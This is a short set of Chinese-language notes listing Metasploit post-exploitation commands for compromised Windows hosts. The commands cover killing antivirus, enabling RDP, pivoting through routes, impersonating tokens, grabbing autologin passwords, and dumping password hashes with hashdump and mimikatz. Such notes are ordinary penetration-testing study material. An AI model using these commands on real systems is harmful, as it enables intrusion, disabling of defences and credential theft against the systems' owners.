metasploit 后渗透的一些命令笔记

  • 当前进程号 getpid
  • 进程迁移 migrate <pid>
  • 自动进程迁移 run post/windows/manage/migrate
  • 查看系统信息 sysinfo
  • 查看是否虚拟机 run post/windows/gather/checkvm
  • 查看运行时间 idletime
  • 查看目标完整的网络设置 route
  • 当前用户名/权限 getuid
  • 关闭操作系统上的杀毒软件 run post/windows/manage/killav
  • 启动目标的远程桌面协议 run post/windows/manage/enable_rdp

对其他主机进行攻击(攻击者借用此方式对其他网段机器进行攻击)

  • 查看本地子网信息 run post/multi/manage/autoroute
  • background情况下,添加路由 route add 192.168.x.x 255.255.255.0 1
  • 查看route route print
  • 枚举多少个用户登录了系统 run post/windows/gather/enum_logged_on_users
  • 抓取自动登录的用户的用户名和密码 run post/windows/gather/credentials/windows_autologin

权限提升

  • 查看补丁 systeminfo
  • 列出补丁 wmic qfe get Caption,Description,HotFixID,InstalledOn
  • 通过未打补丁的漏洞进行提权

利用窃取令牌来提升权限

  • 列出令牌
    • use incognito
    • list_tokens -u
  • 假冒用户 impersonate_token xxx\\xxx

Hash攻击(破解Hash即可获得登录密码– 必须要有系统级账号)

  • 导出 sam中的Hash hashdump
  • 如果当前权限为systemhashdump无法导出,原因是因为可能开启了uac,导出失败
    • 使用 run post/windows/gather/smart_hashdump
  • 使用mimikatz
    • 加载 mimikatz load mimikatz
    • 抓取 Hash msv
    • kerberos抓取票据, wdigest获取系统账户信息, mimikatz_command -f samdump:hases抓取Hash